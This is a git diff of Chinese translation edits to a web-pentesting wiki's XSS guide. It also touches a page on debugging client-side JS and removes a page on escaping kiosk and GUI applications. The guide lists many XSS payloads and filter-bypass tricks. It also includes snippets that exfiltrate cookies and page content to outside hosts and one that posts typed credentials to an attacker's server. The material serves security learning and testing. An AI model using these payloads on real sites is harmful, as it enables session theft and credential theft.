如果你的输入在标签的属性值中被反射,你可以尝试:
1. **从属性和标签中逃逸**(然后你将处于原始 HTML 中)并创建新的 HTML 标签进行利用:`"><img [...]`
2. 如果你 **可以从属性中逃逸但不能从标签中逃逸**`>` 被编码或删除),根据标签你可以 **创建一个事件** 来执行 JS 代码:`" autofocus onfocus=alert(1) x="`
3. 如果你 **无法从属性中逃逸**`"` 被编码或删除),那么根据 **你的值被反射在哪个属性中**,如果你控制整个值或仅部分值,你将能够利用它。例如,如果你控制一个事件如 `onclick=`,你将能够使其在点击时执行任意代码。另一个有趣的 **例子** 是属性 `href`,你可以使用 `javascript:` 协议来执行任意代码:**`href="javascript:alert(1)"`**
4. 如果你的输入在 "**不可利用的标签**" 被反射,你可以尝试 **`accesskey`** 技巧来利用这个漏洞(你需要某种社会工程来利用它):**`" accesskey="x" onclick="alert(1)" x="**
1. **逃逸属性和标签**(然后你将处于原始 HTML 中)并创建新的 HTML 标签进行利用:`"><img [...]`
2. 如果你 **能逃逸属性但不能逃逸标签**`>` 被编码或删除),根据标签你可以 **创建一个事件** 来执行 JS 代码:`" autofocus onfocus=alert(1) x="`
3. 如果你 **无法逃逸属性**`"` 被编码或删除),那么根据 **你的值被反射在哪个属性** 以及 **你是否控制整个值或仅部分值**,你将能够利用它。例如,如果你控制一个事件如 `onclick=`,你将能够使其在点击时执行任意代码。另一个有趣的 **例子** 是属性 `href`,你可以使用 `javascript:` 协议来执行任意代码:**`href="javascript:alert(1)"`**
4. 如果你的输入在 "**不可利用的标签**" 被反射,你可以尝试 **`accesskey`** 技巧来利用这个漏洞(你需要某种社会工程来利用它):**`" accesskey="x" onclick="alert(1)" x="**
如果你控制一个类名Angular 执行 XSS 的奇怪例子:
```html
@ -70,7 +72,7 @@ debugging-client-side-js.md
在这种情况下,您的输入反映在 HTML 页面中的 **`<script> [...] </script>`** 标签之间,或者在 `.js` 文件中,或在使用 **`javascript:`** 协议的属性中:
- 如果反映在 **`<script> [...] </script>`** 标签之间,即使您的输入在任何类型的引号内,您可以尝试注入 `</script>` 并逃离此上下文。这是有效的,因为 **浏览器会首先解析 HTML 标签** 然后解析内容,因此,它不会注意到您注入的 `</script>` 标签在 HTML 代码中。
- 如果反映 **在 JS 字符串内**,并且最后一个技巧不起作用,您需要 **退出** 字符串,**执行** 您的代码并 **重构** JS 代码(如果有任何错误,它将不会被执行):
- 如果反映 **在 JS 字符串内**,并且最后技巧不起作用,您需要 **退出** 字符串,**执行** 您的代码并 **重构** JS 代码(如果有任何错误,它将不会被执行):
- `'-alert(1)-'`
- `';-alert(1)//`
- `\';alert(1)//`
@ -94,7 +96,7 @@ js-hoisting.md
一些网页有端点**接受作为参数要执行的函数名称**。在实际中常见的例子是类似于:`?callback=callbackFunc`
找出用户直接提供的内容是否试被执行的一个好方法是**修改参数值**(例如改为 'Vulnerable'),并在控制台中查找错误,例如:
找出用户直接提供的内容是否试被执行的一个好方法是**修改参数值**(例如改为 'Vulnerable'),并在控制台中查找错误,例如:
![](<../../images/image (711).png>)
@ -102,7 +104,7 @@ js-hoisting.md
然而,即使有这个限制,仍然可以执行一些操作。这是因为您可以使用这些有效字符**访问 DOM 中的任何元素**
![](<../../images/image (747).png>)
![](<../../images/image (747).png>)
一些有用的函数:
```
@ -132,7 +134,7 @@ dom-xss.md
### **通用 XSS**
这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用,还依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取****任意****文件**在客户端和服务器上,等等。\
这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用,还依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取**客户端和服务器中的**任意****文件**等。\
一些**示例**
{{#ref}}
@ -151,7 +153,7 @@ server-side-xss-dynamic-pdf.md
当您的输入在**HTML 页面中被反射**或您可以在此上下文中转义并注入 HTML 代码时,您需要做的**第一**件事是检查您是否可以滥用 `<` 来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**,或者是否**未更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
对于这些情况,还**请记住** [**客户端模板注入**](../client-side-template-injection-csti.md)**。**\
_**注意HTML 注释可以使用\*\***\***\*`-->`\*\***\***\*或\*\***`--!>`\*\*关闭_
_**注意HTML 注释可以使用\*\***\***\*`-->`\*\***\***\*或 \*\***`--!>`\*\*_
在这种情况下,如果没有使用黑名单/白名单,您可以使用如下有效载荷:
```html
@ -162,11 +164,11 @@ alert(1)
<svg onload=alert('XSS')>
```
但是,如果使用了标签/属性的黑白名单,您需要**暴力破解可以创建的标签**。\
一旦您**找到了允许的标签**,您需要**暴力破解**在找到的有效标签内的属性/事件,以查看如何攻击该上下文。
一旦您**找到了允许的标签**,您需要**暴力破解属性/事件**,以查看如何攻击该上下文。
### 标签/事件暴力破解
访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 并点击 _**复制标签到剪贴板**_。然后,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_ 并按照之前的程序进行)。
访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet),然后点击 _**复制标签到剪贴板**_。接着,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_并按照之前的程序进行)。
### 自定义标签
@ -243,14 +245,14 @@ onerror=alert`1`
### 不可能 - 悬挂标记
如果你认为 **创建一个带有属性以执行 JS 代码的 HTML 标签是不可能的**,你应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/index.html),因为你可以 **在不执行** **JS** 代码的情况下 **利用** 该漏洞。
如果你认为 **创建一个带有执行 JS 代码的属性的 HTML 标签是不可能的**,你应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/index.html),因为你可以 **在不执行** **JS** 代码的情况下 **利用** 该漏洞。
## 在 HTML 标签内注入
### 在标签内/从属性值中转义
如果你在 **HTML 标签内**,你可以尝试的第一件事是 **从标签中转义**,并使用 [上一节](#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
如果你 **无法从标签中转义**,你可以在标签内创建新的属性以尝试执行 JS 代码例如使用一些有效载荷_请注意在此示例中使用双引号从属性中转义如果你的输入直接反映在标签内不需要它们_
如果你 **无法从标签中转义**,你可以在标签内创建新的属性来尝试执行 JS 代码例如使用一些有效载荷_注意在这个例子中使用双引号来从属性中转义如果你的输入直接反映在标签内你就不需要它们_
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@ -265,14 +267,14 @@ onerror=alert`1`
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### 在属性内
### Within the attribute
即使你**无法从属性中逃脱**`"`被编码或删除),根据**你的值反射在哪个属性中****如果你控制所有值或只是部分值**,你将能够利用它。例如,如果你控制一个事件如`onclick=`,你将能够使其在点击时执行任意代码。\
另一个有趣的**例子**是属性`href`,你可以使用`javascript:`协议来执行任意代码:**`href="javascript:alert(1)"`**
**使用HTML编码/URL编码绕过事件**
**通过HTML编码/URL编码绕过事件**
HTML标签属性值内的**HTML编码字符**在运行时会被**解码**。因此,像以下内容将是有效的(有效负载用粗体表示):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">返回</a>`
HTML标签属性值中的**HTML编码字符**在运行时**被解码**。因此,像以下内容将是有效的(有效负载用粗体表示):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
请注意**任何类型的HTML编码都是有效的**
```javascript
@ -303,7 +305,7 @@ HTML标签属性值内的**HTML编码字符**在运行时会被**解码**。因
```
### 特殊协议在属性中
在某些地方,您可以使用协议 **`javascript:`** 或 **`data:`** 来 **执行任意 JS 代码**。有些需要用户交互,有些则不需要。
在某些地方,您可以使用协议 **`javascript:`** 或 **`data:`** 来 **执行任意 JS 代码**。有些需要用户交互,有些则不需要。
```javascript
javascript:alert(1)
JavaSCript:alert(1)
@ -351,17 +353,17 @@ _**在这种情况下上一节中的HTML编码和Unicode编码技巧在属性
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
此外,对于这些情况还有另一个**不错的技巧****即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用**单引号**从**字符串**中**逃逸**,并且你看到**它被 URL 编码**,请记住**这没关系,**在**执行**时它会被**解释**为**单引号**。
此外,对于这些情况还有另一个**不错的技巧****即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用**单引号**从**字符串**中**逃逸**,并且你看到**它被 URL 编码**,请记住**这没关系,**它将在**执行**时被**解释**为**单引号**。
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
注意,如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将不会** **工作**,但你可以在 **payload****混合使用**。
注意,如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将不会** **工作**,但你可以在 **payload****混合使用它们**。
**使用 Hex 和 Octal 编码与 `javascript:`**
你可以在 `iframe``src` 属性中(至少)使用 **Hex****Octal encode** 来声明 **HTML 标签以执行 JS**
你可以在 `iframe``src` 属性中(至少)使用 **Hex****Octal 编码** 来声明 **HTML 标签以执行 JS**
```javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
@ -373,7 +375,7 @@ _**在这种情况下上一节中的HTML编码和Unicode编码技巧在属性
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
### 反向标签窃取
### 反向标签劫持
```javascript
<a target="_blank" rel="opener"
```
@ -422,15 +424,15 @@ onbeforetoggle="alert(2)" />
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields):您可以在隐藏属性中执行**XSS有效负载**,前提是您可以**说服****受害者**按下**键组合**。在Firefox Windows/Linux上键组合是**ALT+SHIFT+X**在OS X上是**CTRL+ALT+X**。您可以使用访问键属性中的不同键指定不同的键组合。这里是向量:
从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields):您可以在隐藏属性中执行**XSS有效负载**,前提是您能够**说服****受害者**按下**键组合**。在Firefox Windows/Linux上键组合是**ALT+SHIFT+X**在OS X上是**CTRL+ALT+X**。您可以使用访问键属性中的不同键指定不同的键组合。这里是向量:
```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```
**XSS有效载将类似于:`" accesskey="x" onclick="alert(1)" x="`**
**XSS有效载将类似于:`" accesskey="x" onclick="alert(1)" x="`**
### 黑名单绕过
本节中已经揭示了使用不同编码的几种技巧。请**返回学习您可以使用的内容:**
本节中已经揭示了几种使用不同编码的技巧。请**返回学习您可以使用的内容:**
- **HTML编码HTML标签**
- **Unicode编码可以是有效的JS代码** `\u0061lert(1)`
@ -468,7 +470,7 @@ onbeforetoggle="alert(2)" />
## 在JavaScript代码中注入
在这情况下,您的**输入**将**反映在.js文件的JS代码**中,或在`<script>...</script>`标签之间或在可以执行JS代码的HTML事件之间或在接受`javascript:`协议的属性之间。
在这情况下,您的**输入**将**反映在.js文件的JS代码**中,或在`<script>...</script>`标签之间或在可以执行JS代码的HTML事件之间或在接受`javascript:`协议的属性之间。
### 转义\<script>标签
@ -478,7 +480,7 @@ onbeforetoggle="alert(2)" />
```
注意,在这个例子中我们**甚至没有关闭单引号**。这是因为**HTML 解析首先由浏览器执行**,这涉及到识别页面元素,包括脚本块。解析 JavaScript 以理解和执行嵌入的脚本是在之后进行的。
### 在 JS 代码内部
### Inside JS code
如果 `<>` 被清理,你仍然可以**转义字符串**,在你的输入**所在的位置**并**执行任意 JS**。修复 JS 语法是很重要的因为如果有任何错误JS 代码将不会被执行:
```
@ -746,14 +748,14 @@ top[8680439..toString(30)](1)
dom-xss.md
{{#endref}}
里你会找到关于 **DOM 漏洞是什么、如何引发它们以及如何利用它们的详细解释**。\
此外,别忘了**提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
里你会找到关于 **DOM 漏洞是什么、如何引发它们以及如何利用它们的详细解释**。\
此外,不要忘记**提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
### 升级 Self-XSS
### 升级自我 XSS
### Cookie XSS
如果你可以通过在 cookie 中发送有效负载来触发 XSS这通常是自我 XSS。然而如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie从而在主域或其他子域易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此,你可以使用 cookie tossing 攻击:
如果你可以通过在 cookie 中发送有效负载来触发 XSS这通常是自我 XSS。然而如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie从而在主域或其他子域易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此你可以使用 cookie 投掷攻击:
{{#ref}}
../hacking-with-cookies/cookie-tossing.md
@ -767,7 +769,7 @@ dom-xss.md
### 会话镜像
如果你发现一些自我 XSS并且网页有 **管理员的会话镜像**,例如允许客户请求帮助,为了帮助你,管理员将看到你在你的会话中看到的内容,但从他的会话中
如果你发现一些自我 XSS并且网页有 **管理员的会话镜像**,例如允许客户请求帮助,为了帮助你,管理员将看到他在他的会话中所看到的内容
你可以让 **管理员触发你的自我 XSS** 并窃取他的 cookies/会话。
@ -783,8 +785,8 @@ dom-xss.md
```
### Ruby-On-Rails 绕过
由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后绕过引号限制,并且可以在标签内添加额外字段onfocus。\
表单示例 ([from this report](https://hackerone.com/reports/709336)),如果发送有效负载:
由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后引号限制被绕过额外字段onfocus可以被添加到标签内。\
表单示例 ([from this report](https://hackerone.com/reports/709336)),如果发送有效负载:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
@ -792,7 +794,7 @@ contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
```
然后,将插入 onfocus 属性,发生 XSS。
然后,将插入 onfocus 属性,发生 XSS。
### 特殊组合
```html
@ -824,24 +826,24 @@ contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS with header injection in a 302 response
### XSS与302响应中的头注入
如果你发现可以**302 重定向响应中注入头**,你可以尝试 **让浏览器执行任意 JavaScript**。这 **并不简单**,因为现代浏览器在 HTTP 响应状态码为 302 时不会解释 HTTP 响应体,因此仅仅一个跨站脚本有效载荷是无用的。
如果你发现可以**302重定向响应中注入头**,你可以尝试**让浏览器执行任意JavaScript**。这**并不简单**因为现代浏览器在HTTP响应状态码为302时不会解释HTTP响应体因此仅仅一个跨站脚本有效载荷是无用的。
[**这份报告**](https://www.gremwell.com/firefox-xss-302) [**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/) 中,你可以阅读如何测试 Location 中的几种协议,并查看其中是否有任何协议允许浏览器检查并执行响应体中的 XSS 有效载荷。\
已知的过去协议: `mailto://` `//x:1/` `ws://` `wss://` _空 Location 头部_ `resource://`
在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中你可以阅读如何测试Location头中的几种协议并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
已知的过去协议:`mailto://``//x:1/``ws://``wss://`、_空Location头_、`resource://`
### 仅限字母、数字和点
如果你能够指示 JavaScript 将要 **执行****回调** 限制在这些字符内。 [**阅读这篇文章的这一部分**](#javascript-function) 以了解如何利用这种行为。
如果你能够指示javascript将要**执行**的**回调**仅限于这些字符。[**阅读这篇文章的这一部分**](#javascript-function)以了解如何利用这种行为。
### 有效的 `<script>` 内容类型以进行 XSS
### 有效的`<script>`内容类型以进行XSS
(来自 [**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))如果你尝试加载一个 **内容类型** `application/octet-stream` 的脚本Chrome 将抛出以下错误:
(来自[**这里**](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/))如果你尝试加载一个**内容类型**为`application/octet-stream`的脚本Chrome将抛出以下错误
> 拒绝从 [https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') 执行脚本,因为其 MIME 类型application/octet-stream不可执行并且启用了严格的 MIME 类型检查。
> 拒绝从‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')执行脚本因为其MIME类型application/octet-stream不可执行并且启用了严格的MIME类型检查。
唯一支持 Chrome 运行 **加载脚本** **Content-Type** 来自 [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc) 的常量 **`kSupportedJavascriptTypes`** 中的类型。
唯一支持Chrome运行**加载脚本**的**Content-Type**是[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)中const **`kSupportedJavascriptTypes`**中的类型。
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
@ -899,7 +901,7 @@ import { partition } from "lodash"
```
这种行为在 [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) 中被用来重新映射一个库到 eval以滥用它可以触发 XSS。
- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** 这个功能主要是为了解决一些由预渲染引起的问题。它的工作原理如下
- [**speculationrules**](https://github.com/WICG/nav-speculation)**:** 这个功能主要是为了解决一些由预渲染引起的问题。它的工作原理
```html
<script type="speculationrules">
{
@ -985,7 +987,7 @@ constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
```
如果在执行不可信代码之前**一切都是未定义的**(如在[**这篇文章**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)中所述),则可以“凭空”生成有用的对象,以滥用任意不可信代码的执行:
如果在执行不受信任的代码之前**一切都是未定义的**(如在[**这篇文章**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/index.html#miscx2fundefined55-solves)中所述),则可以“凭空”生成有用的对象,以滥用任意不受信任代码的执行:
- 使用 import()
```javascript
@ -1266,7 +1268,7 @@ steal-info-js.md
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
> [!NOTE]
> [!TIP]
> 如果在 cookie 中设置了 HTTPOnly 标志,您 **将无法通过 JavaScript 访问 cookies**。但如果您足够幸运,这里有 [一些绕过此保护的方法](../hacking-with-cookies/index.html#httponly)。
### 偷取页面内容
@ -1282,7 +1284,7 @@ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
xhr.open("GET", url, true)
xhr.send(null)
```
### 查找内部IP
### 查找内部IP地址
```html
<script>
var q = []
@ -1377,7 +1379,7 @@ mode: 'no-cors',
body:username.value+':'+this.value
});">
```
当任何数据被输入到密码字段时,用户名和密码会被发送到攻击者的服务器,即使客户端选择了一个保存的密码而没有输入任何内容,凭据也会被外泄。
当任何数据被输入到密码字段时,用户名和密码会被发送到攻击者的服务器,即使客户端选择了一个保存的密码而没有输入任何内容,凭据也会被外泄。
### Keylogger
@ -1423,7 +1425,7 @@ abusing-service-workers.md
shadow-dom.md
{{#endref}}
### 多语言混合
### 多语言
{{#ref}}
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt
@ -1542,8 +1544,8 @@ xss-in-markdown.md
### 动态创建 PDF 中的 XSS
如果网页使用用户控制的输入创建 PDF您可以尝试 **欺骗创建 PDF 的机器人** **执行任意 JS 代码**。\
因此,如果 **PDF 创建机器人发现** 某种 **HTML** **标签**,它将 **解释** 这些标签,您可以 **利用** 这种行为导致 **服务器 XSS**
如果网页使用用户控制的输入创建 PDF您可以尝试 **欺骗创建 PDF 的机器人**,使其 **执行任意 JS 代码**。\
因此,如果 **PDF 创建机器人发现**某种 **HTML** **标签**,它将 **解释** 这些标签,您可以 **利用** 这种行为导致 **服务器 XSS**
{{#ref}}
server-side-xss-dynamic-pdf.md
@ -1557,11 +1559,11 @@ pdf-injection.md
### Amp4Email 中的 XSS
AMP 旨在加速移动设备上的网页性能,结合了 HTML 标签和 JavaScript以确保功能性同时强调速度和安全性。它支持多种组件以实现各种功能您可以通过 [AMP components](https://amp.dev/documentation/components/?format=websites) 访问。
AMP 旨在加速移动设备上的网页性能,包含 HTML 标签并补充 JavaScript以确保功能性同时强调速度和安全性。它支持多种组件以实现各种功能您可以通过 [AMP components](https://amp.dev/documentation/components/?format=websites) 访问。
[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) 格式将特定的 AMP 组件扩展到电子邮件中,使收件人能够直接在电子邮件中与内容互动。
示例 [**在 Gmail 中的 Amp4Email XSS 写作**](https://adico.me/post/xss-in-gmail-s-amp4email)。
示例 [**在 Gmail 中的 Amp4Email XSS 写作**](https://adico.me/post/xss-in-gmail-s-amp4email)。
### XSS 上传文件 (svg)
@ -1623,7 +1625,7 @@ id="foo"/>
```
找到 **更多 SVG 载荷在** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
## 杂项 JS 技巧与相关信息
## 其他 JS 技巧与相关信息
{{#ref}}
other-js-tricks.md

16
src/pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md
View File

@ -1,27 +1,25 @@
# 调试客户端 JS
## 调试客户端 JS
{{#include ../../banners/hacktricks-training.md}}
调试客户端 JS 可能很麻烦,因为每次你更改 URL包括参数或参数值的更改需要 **重置断点并重新加载页面**
调试客户端 JS 可能很麻烦,因为每次您更改 URL包括参数或参数值的更改需要 **重置断点并重新加载页面**
### `debugger;`
如果在 JS 文件中放置 `debugger;` 这一行,当 **浏览器** 执行 JS 时,它会在该位置 **停止** **调试器**。因此,设置常量断点的一种方法是 **将所有文件下载到本地并在 JS 代码中设置断点**
如果在 JS 文件中放置 `debugger;` 这一行,当 **浏览器** 执行 JS 时,它会在该位置 **停止** **调试器**。因此,设置常量断点的一种方法是 **将所有文件下载到本地并在 JS 代码中设置断点**
### 覆盖
浏览器覆盖允许拥有即将执行的代码的本地副本,并执行该副本而不是来自远程服务器的代码。\
可以在 "Dev Tools" --> "Sources" --> "Overrides" 中 **访问覆盖**
浏览器覆盖允许拥有即将执行的代码的本地副本,并执行该副本而不是来自远程服务器的代码。\
可以在 "Dev Tools" --> "Sources" --> "Overrides" 中 **访问覆盖**
需要 **创建一个本地空文件夹来存储覆盖**,所以只需创建一个新的本地文件夹并在该页面中将其设置为覆盖。
需要 **创建一个本地空文件夹来存储覆盖**,所以只需创建一个新的本地文件夹并在该页面中将其设置为覆盖。
然后,在 "Dev Tools" --> "Sources" 中 **选择你想要覆盖的文件**,并 **右键选择 "Save for overrides"**。
然后,在 "Dev Tools" --> "Sources" 中 **选择您想要覆盖的文件**,并 **右键单击选择 "Save for overrides"**。
![](<../../images/image (742).png>)
这将 **在本地复制 JS 文件**你将能够 **在浏览器中修改该副本**。所以只需在你想要的地方添加 **`debugger;`** 命令,**保存** 更改并 **重新加载** 页面,每次你访问该网页时 **你的本地 JS 副本将被加载**,并且你的调试器命令将保持在其位置:
这将 **在本地复制 JS 文件**您将能够 **在浏览器中修改该副本**。所以只需在您想要的地方添加 **`debugger;`** 命令,**保存** 更改并 **重新加载** 页面,每次您访问该网页时 **您的本地 JS 副本将被加载**,并且您的调试命令将保持在其位置:
![](<../../images/image (594).png>)

276
src/physical-attacks/escaping-from-gui-applications/README.md
View File

@ -1,276 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# 检查 GUI 应用程序内可能的操作
**常见对话框**是指**保存文件**、**打开文件**、选择字体、颜色等选项。大多数情况下,它们将**提供完整的资源管理器功能**。这意味着如果您可以访问这些选项,您将能够访问资源管理器的功能:
- 关闭/另存为
- 打开/使用其他程序打开
- 打印
- 导出/导入
- 搜索
- 扫描
您应该检查是否可以:
- 修改或创建新文件
- 创建符号链接
- 访问受限区域
- 执行其他应用程序
## 命令执行
也许**使用 `Open with` 选项**,您可以打开/执行某种 shell。
### Windows
例如 _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ 在这里找到更多可以用来执行命令(并执行意外操作)的二进制文件:[https://lolbas-project.github.io/](https://lolbas-project.github.io)
### \*NIX \_\_
_bash, sh, zsh..._ 更多信息请见:[https://gtfobins.github.io/](https://gtfobins.github.io)
# Windows
## 绕过路径限制
- **环境变量**:有很多环境变量指向某个路径
- **其他协议**_about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
- **符号链接**
- **快捷方式**CTRL+N打开新会话CTRL+R执行命令CTRL+SHIFT+ESC任务管理器Windows+E打开资源管理器CTRL-BCTRL-I收藏夹CTRL-H历史记录CTRL-LCTRL-O文件/打开对话框CTRL-P打印对话框CTRL-S另存为
- 隐藏的管理菜单CTRL-ALT-F8CTRL-ESC-F9
- **Shell URIs**_shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
- **UNC 路径**:连接到共享文件夹的路径。您应该尝试连接到本地计算机的 C$"\\\127.0.0.1\c$\Windows\System32"
- **更多 UNC 路径:**
| UNC | UNC | UNC |
| ------------------------- | -------------- | -------------------- |
| %ALLUSERSPROFILE% | %APPDATA% | %CommonProgramFiles% |
| %COMMONPROGRAMFILES(x86)% | %COMPUTERNAME% | %COMSPEC% |
| %HOMEDRIVE% | %HOMEPATH% | %LOCALAPPDATA% |
| %LOGONSERVER% | %PATH% | %PATHEXT% |
| %ProgramData% | %ProgramFiles% | %ProgramFiles(x86)% |
| %PROMPT% | %PSModulePath% | %Public% |
| %SYSTEMDRIVE% | %SYSTEMROOT% | %TEMP% |
| %TMP% | %USERDOMAIN% | %USERNAME% |
| %USERPROFILE% | %WINDIR% | |
## 下载您的二进制文件
控制台:[https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
资源管理器:[https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
注册表编辑器:[https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
## 从浏览器访问文件系统
| PATH | PATH | PATH | PATH |
| ------------------- | ----------------- | ------------------ | ------------------- |
| File:/C:/windows | File:/C:/windows/ | File:/C:/windows\\ | File:/C:\windows |
| File:/C:\windows\\ | File:/C:\windows/ | File://C:/windows | File://C:/windows/ |
| File://C:/windows\\ | File://C:\windows | File://C:\windows/ | File://C:\windows\\ |
| C:/windows | C:/windows/ | C:/windows\\ | C:\windows |
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
| %HOMEDRIVE% | %HOMESHARE | | <p><br></p> |
## 快捷键
- Sticky Keys 按 SHIFT 5 次
- Mouse Keys SHIFT+ALT+NUMLOCK
- High Contrast SHIFT+ALT+PRINTSCN
- Toggle Keys 按住 NUMLOCK 5 秒
- Filter Keys 按住右 SHIFT 12 秒
- WINDOWS+F1 Windows 搜索
- WINDOWS+D 显示桌面
- WINDOWS+E 启动 Windows 资源管理器
- WINDOWS+R 运行
- WINDOWS+U 辅助功能中心
- WINDOWS+F 搜索
- SHIFT+F10 上下文菜单
- CTRL+SHIFT+ESC 任务管理器
- CTRL+ALT+DEL 在较新版本的 Windows 上显示启动画面
- F1 帮助 F3 搜索
- F6 地址栏
- F11 在 Internet Explorer 中切换全屏
- CTRL+H Internet Explorer 历史记录
- CTRL+T Internet Explorer 新标签
- CTRL+N Internet Explorer 新页面
- CTRL+O 打开文件
- CTRL+S 保存 CTRL+N 新 RDP / Citrix
## 滑动操作
- 从左侧向右滑动以查看所有打开的窗口,最小化 KIOSK 应用程序并直接访问整个操作系统;
- 从右侧向左滑动以打开操作中心,最小化 KIOSK 应用程序并直接访问整个操作系统;
- 从顶部边缘向下滑动以使全屏模式下的应用程序的标题栏可见;
